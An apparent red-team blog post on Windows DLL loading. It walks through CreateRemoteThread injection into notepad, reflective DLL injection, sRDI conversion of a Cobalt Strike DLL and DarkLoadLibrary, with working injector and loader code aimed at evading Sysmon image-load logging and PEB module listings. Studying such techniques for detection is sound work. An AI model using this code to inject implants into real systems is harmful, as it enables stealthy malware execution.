This is an archived post from 2021; I have since revisited it (TBD) ⚠
Introduction
Right, so, this is a bit of a long one. I want to go over a few methods of loading DLLs into processes, then build on that by looking into Reflective DLLs, some Sysmon events associated with loading DLLs, and finally DarkLoadLibrary, which could be a great alternative to bootstrapping DLLs.
Before we get into loading DLLs, the following statement is from Microsoft, in the What is a DLL article:
For the Windows operating systems, much of the functionality of the operating system is provided by DLL. Additionally, when you run a program on one of these Windows operating systems, much of the functionality of the program may be provided by DLLs. For example, some programs may contain many different modules, and each module of the program is contained and distributed in DLLs.
The use of DLLs helps promote modularization of code, code reuse, efficient memory usage, and reduced disk space. So, the operating system and the programs load faster, run faster, and take less disk space on the computer.
Essentially, a DLL, or Dynamic-Link Library, is a library that contains various pieces of code and data and provides a modular approach to code. When we use a function like LoadLibraryA, we're pulling that from kernel32.dll:
All that's happened here is that LoadLibraryA has been called on our debug-dll.dll from earlier. Here is a quick description of LoadLibraryA:
LoadLibrary can be used to load a library module into the address space of the process and return a handle that can be used in GetProcAddress to get the address of a DLL function. LoadLibrary can also be used to load other executable modules. For example, the function can specify an .exe file to get a handle that can be used in FindResource or LoadResource. However, do not use LoadLibrary to run an .exe file. Instead, use the CreateProcess function.
This one is a bit more complicated as it requires us to do a bit of process injection. I discussed DLL Injection in-depth in Process Injection Part 1: The Theory, so I won't go into detail here. But, essentially what is happening in the following code is a sacrificial process is being created with CreateProcessA and then a given DLL is being injected. This just means that we will create a process, then inject the DLL into memory and have it load there.
The code:
void remote_load_dll(LPCSTR path)
{
    LPSTARTUPINFOA si = new STARTUPINFOA();
    PPROCESS_INFORMATION pi = new PROCESS_INFORMATION();

    if (CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, TRUE, 0, NULL, NULL, si, pi) == NULL)
    {
        printf("[!] Failed to create process!\n");
        return;
    }
    else
    {
        printf(" :: Process ID: %d\n", pi->dwProcessId);
        printf(" :: Process Handle: %p\n", pi->hProcess);

        int len = strlen(path);
        LPVOID pAddress = VirtualAllocEx(pi->hProcess, nullptr, len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        printf(" :: Base Address: %p\n", pAddress);

        WriteProcessMemory(pi->hProcess, pAddress, (LPVOID)path, len, NULL);

        PTHREAD_START_ROUTINE pRoutine = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("Kernel32"), "LoadLibraryA");
        printf(" :: THREAD_START_ROUTINE: %p\n", pRoutine);

        HANDLE hThread = CreateRemoteThread(pi->hProcess, NULL, 0, pRoutine, pAddress, 0, NULL);
        printf(" :: Thread: %p\n", hThread);

        if (pi->hProcess) CloseHandle(pi->hProcess);
        if (pi->hThread) CloseHandle(pi->hThread);
        if (hThread) CloseHandle(hThread);
    }
}
Process ID 16684 was created and injected into, loading the MessageBoxA DLL:
The issue we have here is that the DLL is being loaded from disk, meaning that, in an offensive scenario, the malicious DLL will have to be written to the target's disk:
int len = strlen(path);
LPVOID pAddress = VirtualAllocEx(pi->hProcess, nullptr, len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi->hProcess, pAddress, (LPVOID)path, len, NULL);
PTHREAD_START_ROUTINE pRoutine = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("Kernel32"), "LoadLibraryA");
HANDLE hThread = CreateRemoteThread(pi->hProcess, NULL, 0, pRoutine, pAddress, 0, NULL);
The debug-dll.dll can also be seen in the linked modules:
Let's look at a way of removing the requirement for on-disk DLLs to reduce the chance of being so obvious.
This technique was originally written by Stephen Fewer and the original code can be found in stephenfewer/ReflectiveDLLInjection. The repository provided by Stephen Fewer goes over how this technique works quite well:
Execution is passed, either via CreateRemoteThread() or a tiny bootstrap shellcode, to the library's ReflectiveLoader function which is an exported function found in the library's export table.
As the library's image will currently exists in an arbitrary location in memory the ReflectiveLoader will first calculate its own image's current location in memory so as to be able to parse its own headers for use later on.
The ReflectiveLoader will then parse the host processes kernel32.dll export table in order to calculate the addresses of three functions required by the loader, namely LoadLibraryA, GetProcAddress and VirtualAlloc.
The ReflectiveLoader will now allocate a continuous region of memory into which it will proceed to load its own image. The location is not important as the loader will correctly relocate the image later on.
The library's headers and sections are loaded into their new locations in memory.
The ReflectiveLoader will then process the newly loaded copy of its image's import table, loading any additional library's and resolving their respective imported function addresses.
The ReflectiveLoader will then process the newly loaded copy of its image's relocation table.
The ReflectiveLoader will then call its newly loaded image's entry point function, DllMain with DLL_PROCESS_ATTACH. The library has now been successfully loaded into memory.
Finally the ReflectiveLoader will return execution to the initial bootstrap shellcode which called it, or if it was called via CreateRemoteThread, the thread will terminate.
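Of the steps quoted above, the relocation pass is the one that makes "the location is not important" true, so it is worth a quick sketch. This is a minimal, portable illustration and not code from ReflectiveLoader.c: the function name and signature are made up for this post, it assumes a 64-bit image, and it only handles the two entry types a typical x64 DLL contains (ABSOLUTE padding and DIR64).

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Relocation types from the PE format (values match winnt.h).
constexpr uint16_t REL_ABSOLUTE = 0;  // padding entry, skipped
constexpr uint16_t REL_DIR64    = 10; // 64-bit absolute address

// Hypothetical helper: applies one base relocation block to an image that
// has been copied to a new base address.
//   image   : the mapped image bytes
//   pageRva : RVA of the 4 KiB page this block describes
//   entries : 16-bit entries, high 4 bits = type, low 12 bits = offset in page
//   delta   : actual base minus the preferred ImageBase from the headers
// Returns false on an out-of-bounds entry or an unsupported type.
bool apply_reloc_block(std::vector<uint8_t>& image, uint32_t pageRva,
                       const std::vector<uint16_t>& entries, int64_t delta)
{
    for (uint16_t entry : entries) {
        uint16_t type   = entry >> 12;
        uint32_t offset = pageRva + (entry & 0x0FFF);

        if (type == REL_ABSOLUTE) continue;
        if (type != REL_DIR64) return false;
        if (static_cast<size_t>(offset) + sizeof(uint64_t) > image.size()) return false;

        // Read the stored absolute address, shift it by delta, write it back.
        uint64_t value;
        std::memcpy(&value, image.data() + offset, sizeof(value));
        value += static_cast<uint64_t>(delta);
        std::memcpy(image.data() + offset, &value, sizeof(value));
    }
    return true;
}
```

A real loader walks every block in the relocation directory and calls something like this once per block, with the same delta each time.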
The exported function can be seen on line 49 and will be an indicator that we will look at later on. Additionally, the entirety of the ReflectiveLoader.c is very well commented. So, between the technique explanation, and the code comments, I won't describe everything it is doing.
Let's write something malicious to demonstrate the Reflective DLL process.
First off, the actual DLL. This is very similar to the debug-dll.dll from earlier, in that it will throw a MessageBoxA. The example that will follow is practically identical to ReflectiveDll.c provided by Stephen Fewer. Here is the code we will be working with:
That is the DLL to be injected, so let's look at writing a tool to load this DLL into the target process.
The Injector: Reflective Prerequisites
Before writing the actual injection mechanism, some utility functions are needed. I got these by trial and error against the provided repository, stripping it down until only the minimum required functions remained, which were these two:
#include <windows.h>
#include <stdio.h>

#define WIN_X64
#define DEREF_32( name ) *(DWORD *)(name)
#define DEREF_16( name ) *(WORD *)(name)

DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress )
{
    WORD wIndex = 0;
    PIMAGE_SECTION_HEADER pSectionHeader = NULL;
    PIMAGE_NT_HEADERS pNtHeaders = NULL;

    pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);

    pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);

    if( dwRva < pSectionHeader[0].PointerToRawData )
        return dwRva;

    for( wIndex = 0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ )
    {
        if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) )
            return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData );
    }

    return 0;
}

DWORD GetReflectiveLoaderOffset( VOID* lpReflectiveDllBuffer )
{
    UINT_PTR uiBaseAddress = 0;
    UINT_PTR uiExportDir = 0;
    UINT_PTR uiNameArray = 0;
    UINT_PTR uiAddressArray = 0;
    UINT_PTR uiNameOrdinals = 0;
    DWORD dwCounter = 0;
#ifdef WIN_X64
    DWORD dwCompiledArch = 2;
#else
    // This will catch Win32 and WinRT.
    DWORD dwCompiledArch = 1;
#endif

    uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;

    // get the File Offset of the modules NT Header
    uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;

    // currently we can only process a PE file which is the same type as the one this function has
    // been compiled as, due to various offset in the PE structures being defined at compile time.
    if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32
    {
        if( dwCompiledArch != 1 )
            return 0;
    }
    else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64
    {
        if( dwCompiledArch != 2 )
            return 0;
    }
    else
    {
        return 0;
    }

    // uiNameArray = the address of the modules export directory entry
    uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];

    // get the File Offset of the export directory
    uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress );

    // get the File Offset for the array of name pointers
    uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress );

    // get the File Offset for the array of addresses
    uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );

    // get the File Offset for the array of name ordinals
    uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress );

    // get a counter for the number of exported functions...
    dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames;

    // loop through all the exported functions to find the ReflectiveLoader
    while( dwCounter-- )
    {
        char* cpExportedFunctionName = (char*)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress ));

        if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL )
        {
            // get the File Offset for the array of addresses
            uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );

            // use the functions name ordinal as an index into the array of name pointers
            uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );

            // return the File Offset to the ReflectiveLoader() functions code...
            return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress );
        }

        // get the next exported function name
        uiNameArray += sizeof(DWORD);

        // get the next exported function name ordinal
        uiNameOrdinals += sizeof(WORD);
    }

    return 0;
}
Again, the code is very well commented. But the two functions:
Rva2Offset:
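Converts a Relative Virtual Address (RVA) into a raw file offset. The DLL sits in the buffer exactly as it does on disk, not mapped the way the Windows loader would map it, so any RVA read from the headers has to be translated before it can be used to find the entry-point later on.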
GetReflectiveLoaderOffset:
Does what it says on the tin: walks the export table, using Rva2Offset along the way, and returns the file offset of the ReflectiveLoader export.
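To make the RVA translation a bit more concrete, here is a minimal, portable sketch of the same arithmetic as Rva2Offset. It deliberately avoids windows.h: the Section struct is a hypothetical, trimmed-down stand-in for IMAGE_SECTION_HEADER, and the function name is mine.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Hypothetical stand-in for the three IMAGE_SECTION_HEADER fields that matter.
struct Section {
    uint32_t virtualAddress;   // RVA of the section once mapped
    uint32_t sizeOfRawData;    // bytes the section occupies in the file
    uint32_t pointerToRawData; // file offset of the section's first byte
};

// Same logic as Rva2Offset: returns 0 when no section contains the RVA.
uint32_t rva_to_offset(uint32_t rva, const std::vector<Section>& sections)
{
    // Anything before the first section's raw data lives in the headers,
    // which sit at the same position on disk and in memory.
    if (!sections.empty() && rva < sections[0].pointerToRawData)
        return rva;

    for (const Section& s : sections) {
        if (rva >= s.virtualAddress && rva < s.virtualAddress + s.sizeOfRawData)
            return rva - s.virtualAddress + s.pointerToRawData;
    }
    return 0;
}
```

As a worked example with made-up numbers: if a section is mapped at RVA 0x1000 but stored at file offset 0x400, then RVA 0x1010 translates to 0x1010 - 0x1000 + 0x400 = 0x410.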
With that done, let's look at getting a DLL into memory. At first, I did it the old xxd way, but the DLL came out at 90,000 bytes, which was killing Visual Studio. So, I opted to read the bytes into an LPVOID, which is basically the same format it would be in anyway!
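The ReadBytes helper used in this post is not shown, so here is a rough idea of what such a helper does. This is a portable sketch under my own assumptions, not the original function: the name read_file_bytes is hypothetical, and it returns a std::vector rather than filling an LPVOID and returning a DWORD size.

```cpp
#include <cassert>
#include <cstdint>
#include <fstream>
#include <iterator>
#include <string>
#include <vector>

// Hypothetical helper: reads an entire file into a byte vector.
// Returns an empty vector if the file cannot be opened.
std::vector<uint8_t> read_file_bytes(const std::string& path)
{
    std::ifstream file(path, std::ios::binary);
    if (!file)
        return {};

    // istreambuf_iterator reads raw bytes with no whitespace skipping.
    return std::vector<uint8_t>(std::istreambuf_iterator<char>(file),
                                std::istreambuf_iterator<char>());
}
```

The vector's data() and size() then play the role of the buffer pointer and the size in the code that follows.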
int main(void)
{
    const char* path = "C:\\Users\\mez0\\Desktop\\reflective-dll-blog\\dll-shenanigans\\x64\\Release\\reflective-debug-dll.dll";

    LPVOID buf;
    DWORD bufSz = ReadBytes((char*)path, &buf);
    LPVOID pAddress = nullptr;
    BOOL bProtect;
    HANDLE hThread;
    DWORD lpflOldProtect = 0;
    DWORD dwLdrOffset = 0;

    pAddress = VirtualAlloc(0, bufSz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    RtlMoveMemory(pAddress, buf, bufSz);
    bProtect = VirtualProtect(pAddress, bufSz, PAGE_EXECUTE_READ, &lpflOldProtect);

    dwLdrOffset = GetReflectiveLoaderOffset(buf);
    LPTHREAD_START_ROUTINE lpStartAddress = (LPTHREAD_START_ROUTINE)((ULONG_PTR)pAddress + dwLdrOffset);

    hThread = CreateThread(0, 0, lpStartAddress, 0, 0, 0);
    Sleep(5000); // give ReflectiveLoader time to perform the parsing and loading the DLL into memory.
    WaitForSingleObject(hThread, INFINITE);
}
Executing this:
There is one difference here, and it is the LPTHREAD_START_ROUTINE. Usually, it is just the base address as provided by VirtualAlloc. But this time it uses the GetReflectiveLoaderOffset function to determine the entry-point for the exported function.
The Injector: Remote
This next piece of code is a combination of the process injection from earlier, and the GetReflectiveLoaderOffset in the previous segment:
Executing this, notepad spawns and is injected into:
Investigating the loads
Now that we've looked at both a standard and a reflective DLL, let's inspect the loads. Below is a screenshot of the Reflective DLL being loaded from memory, and no reflective-debug-dll.dll can be seen in the linked modules:
It makes sense: we're executing a DLL from a bootstrapped entry-point, meaning it's not a traditional DLL load. Well, does it trigger the expected kernel callbacks registered with the PsSetLoadImageNotifyRoutine function?
First off, startLogging.xml from cyb3rward0g is used as the configuration file for Sysmon. The event ID for this is 7, below is the relevant config segment:
As we know that the on-disk loader loads DLLs as Windows expects, we can use it to verify that Sysmon is working correctly. The screenshot below shows the on-disk-loader.exe loading debug-dll.dll into the current process (denoted by the 1):
A bunch of Image loaded events are found.
To look up the event in more detail, Event Viewer can be used by going to the following path:
Applications and Services Logs->Microsoft->Windows->Sysmon->Operational
Below is a screenshot of the Reflective DLL being loaded and the script not finding any events:
This makes sense as a DLL is not being loaded the traditional way, but it comes with some OpSec considerations.
x64dbg tangent
The first thing I want to look at is the DLL in memory. After loading it up in x64dbg and setting a breakpoint on VirtualAlloc, the RBP register shows the PE magic bytes, MZ. The base address VirtualAlloc returns matches both the printed statement and the RBP register and, following it into a dump, the full DOS header can be seen:
Dumping the memory to disk:
Armed with a memory dump, we can load it up into PE-Bear and see that this is the valid Reflective DLL:
To sanity check myself, I compared the in-mem-loader to the dumped file to make sure I didn't do anything weird:
Tracking down the ReflectiveLoader export is easy enough in ReflectiveLoader.c:
DLLEXPORT ULONG_PTR WINAPI REFLDR_NAME( VOID )
Where REFLDR_NAME is:
#define REFLDR_NAME ReflectiveLoader
Bit of a tangent, but cool nonetheless.
An Improved Reflective DLL
Something I wanted to quickly bring to light was an improved version of the Reflective DLL that was released by Dan Staples in An Improved Reflective DLL Injection Technique in 2015. Below is a quote from the blog which describes the main improvements made:
It does this by dynamically writing some bootstrap shellcode to the target process which loads the DLL (using LoadLibraryA) and then finds and calls another exported entry point function (using GetProcAddress). While this is a great improvement to traditional DLL injection, it is not reflective.
The article does a great job of detailing the improvements, so I won't repeat it here, but I just wanted to point out that improvements have been made to this technique since it was initially identified.
Shellcode Reflective DLL Injection
Everything achieved so far has required access to the DLL's source code in order to compile the reflective loader component into it. To remove that requirement, a project called sRDI exists. The blog post sRDI – Shellcode Reflective DLL Injection was written to support the project and goes into detail on how it works. But, essentially, it is this:
To quote the blog directly:
When execution starts at the top of the bootstrap, the general flow looks like this:
Get current location in memory (Bootstrap)
Calculate and setup registers (Bootstrap)
Pass execution to RDI with the function hash, user data, and location of the target DLL (Bootstrap)
Un-pack DLL and remap sections (RDI)
Call DLLMain (RDI)
Call exported function by hashed name (RDI) – Optional
Pass user-data to exported function (RDI) – Optional
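The "hashed name" in the flow above means the export is identified by a hash rather than a plaintext string. A rotate-right-by-13 additive hash is a common choice for this kind of lookup, so the sketch below assumes that scheme. Treat it as an illustration only: I have not matched it byte-for-byte against what sRDI computes (for instance, whether the null terminator or module name is folded in), and the function names are mine.

```cpp
#include <cassert>
#include <cstdint>
#include <string>

// Rotate a 32-bit value right by `bits` (valid for 1..31).
constexpr uint32_t ror32(uint32_t value, unsigned bits)
{
    return (value >> bits) | (value << (32 - bits));
}

// Hypothetical ROR-13 hash: rotate the running hash, then add the next byte.
// The terminating null is NOT included in this version.
uint32_t ror13_hash(const std::string& name)
{
    uint32_t hash = 0;
    for (unsigned char c : name) {
        hash = ror32(hash, 13);
        hash += c;
    }
    return hash;
}
```

A loader using this approach hashes each export name it walks and compares the result to the 32-bit value it was given, so the target function name never has to appear as a string in the shellcode.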
As my DLL is huge, I'll use a Staged Cobalt Strike DLL. Below is the sRDI usage:
usage: ConvertToShellcode.py [-h] [-v] [-f FUNCTION_NAME] [-u USER_DATA] [-c] [-i] [-d IMPORT_DELAY] input_dll
RDI Shellcode Converter
positional arguments:
input_dll DLL to convert to shellcode
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-f FUNCTION_NAME, --function-name FUNCTION_NAME
The function to call after DllMain
-u USER_DATA, --user-data USER_DATA
Data to pass to the target function
-c, --clear-header Clear the PE header on load
-i, --obfuscate-imports
Randomize import dependency load order
-d IMPORT_DELAY, --import-delay IMPORT_DELAY
Number of seconds to pause between loading imports
There are some really cool pieces of functionality here, so I recommend taking a look through ShellcodeRDI.py, but that's not in scope for now.
The Cobalt Strike DLL Entry is Start, and that can be verified by running something like this:
Running sRDI and specifying Start as the FUNCTION_NAME:
This can now be loaded into the injector as shown earlier. Again, for the sake of not crashing my Visual Studio, I'll just read the bytes into memory, as opposed to storing 20,000 bytes:
Running this code shows notepad.exe being injected into and the DLL being executed:
Similarly to the Reflective DLL, no linked DLL is shown:
Recap
A few tangents later, what has actually been covered? So far:
Looked at loading DLLs from disk and the associated kernel-callback (PsSetLoadImageNotifyRoutine), as well as the DLLs being linked to the PEB.
Poked around some Reflective DLLs
Looked at sRDI and created a little POC.
Moving on!
DarkLoadLibrary
A few weeks ago, batsec posted an excellent blog called Bypassing Image Load Kernel Callbacks on behalf of MDSec. This project looked at the kernel-callbacks associated with loading modules and linking them to the PEB.
What makes this interesting is the following table from the blog:
As long as I haven't misunderstood the library, this only works within the current process and doesn't support any kind of remote process interactions right out of the box, which is fine. We will work with that. According to the table, however, there's probably not any reason to avoid it, it does it all! Batsec goes on to discuss how this library is essentially the end product of rewriting the Windows library loader from scratch, so kudos to him.
It loads TestDLL.dll and calls ThisIsAFunction. Simples.
Some messing about later, I ended up with a small PE that uses both the load options. First off though, the in memory replicator (read it from a file and store in a buffer):
Depending on the options provided, DarkLoadLibrary will do a few things:
IsValidPE(): Uses e_lfanew from the DOS header to locate the IMAGE_NT_HEADERS, then checks that the Signature is IMAGE_NT_SIGNATURE.
MapSections(): This function does a lot, and is worth a read, but essentially it maps the DLL sections and ensures that all the relocations are handled correctly.
ResolveImports(): Does what it says on the tin. Resolves LoadLibraryA and ensures the DLL has all its imports correctly resolved.
BeginExecution(): This is the actual point of execution, and again, a lot is going on here and is worth reading. But, the purpose of this is the following:
BOOL ok = DllMain( (HINSTANCE)pdModule->ModuleBase, DLL_PROCESS_ATTACH, (LPVOID)NULL);
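Going back to the first step in that list, the kind of check IsValidPE() performs can be sketched in a few lines. This is not DarkLoadLibrary's implementation: it is a portable approximation with a made-up name, it adds bounds checks and an MZ check of my own, and it assumes a little-endian host.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

constexpr uint16_t DOS_MAGIC    = 0x5A4D;     // "MZ", IMAGE_DOS_SIGNATURE
constexpr uint32_t NT_SIGNATURE = 0x00004550; // "PE\0\0", IMAGE_NT_SIGNATURE
constexpr size_t   E_LFANEW_OFF = 0x3C;       // offset of e_lfanew in the DOS header

// Hypothetical check: does this buffer start with a plausible PE image?
bool looks_like_pe(const std::vector<uint8_t>& buf)
{
    if (buf.size() < E_LFANEW_OFF + sizeof(uint32_t))
        return false;

    uint16_t magic;
    std::memcpy(&magic, buf.data(), sizeof(magic));
    if (magic != DOS_MAGIC)
        return false;

    // e_lfanew is the file offset of the NT headers.
    uint32_t lfanew;
    std::memcpy(&lfanew, buf.data() + E_LFANEW_OFF, sizeof(lfanew));
    if (static_cast<size_t>(lfanew) + sizeof(uint32_t) > buf.size())
        return false;

    uint32_t signature;
    std::memcpy(&signature, buf.data() + lfanew, sizeof(signature));
    return signature == NT_SIGNATURE;
}
```

The same two values, MZ at offset 0 and PE\0\0 at e_lfanew, are what show up in the x64dbg dump earlier in the post.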
Experimenting with DarkLoadLibrary
The little tool I put together for this is dark-loader. It supports both modes offered for loading a DLL, and takes in a DLL path. This allowed me to quickly verify that various DLLs worked with the library.
Here is the help:
Let's quickly make sure it works across all the use cases:
Standard DLL: LOAD_LOCAL_FILE
Reflective DLL: LOAD_LOCAL_FILE
Standard DLL: LOAD_MEMORY
Reflective DLL: LOAD_MEMORY
DarkLoadLibrary was able to execute both the standard and Reflective DLL from both the local disk and from memory without any issues!
ImageLoad and Linked Modules
The final thing I want to do is quickly go back over the Sysmon Event ID 7 and the PEB Linked Modules.
Updating the PowerShell script for the $loader and the $dll:
The next screenshot provides no reason to believe this is correct, but no events were found:
The only other way I could prove this is to provide logs or an awkward screenshot of times. But I can't be bothered, so trust me bro.
Checking the linked modules, debug-dll.dll is present:
DarkLoadLibrary also supports NO_LINK, which should remove the above:
dwFlags = LOAD_LOCAL_FILE | NO_LINK;
The DLL executes and the debug-dll cannot be seen:
LOAD_MEMORY
Again, no logs found, but trust me bro:
Arbitrary DLL Naming:
Conclusion
Throughout this blog I've been exploring loading DLLs into memory. This covered loading a standard Windows DLL, a custom DLL (MessageBoxA ftw), and Reflective DLLs. My goal was to identify an OpSec-friendly way of loading modules into memory, and the conclusion I've come to is that if the DLL needs to be loaded into a remote process, then the sRDI project (or something similar) is probably the best way. As for the local process, I cannot see any reason not to take inspiration from BatSec's DarkLoadLibrary and utilise a custom loader. The flexibility to load from both disk and memory, as well as supplying a 'spoofed' module name, currently seems unparalleled.
Hopefully I get around to it, but I want to do a follow-up blog to this where I go over a project I've had for a while which piles onto the C2 Twitter debate by showcasing a method of keeping a small implant that works well with modularity.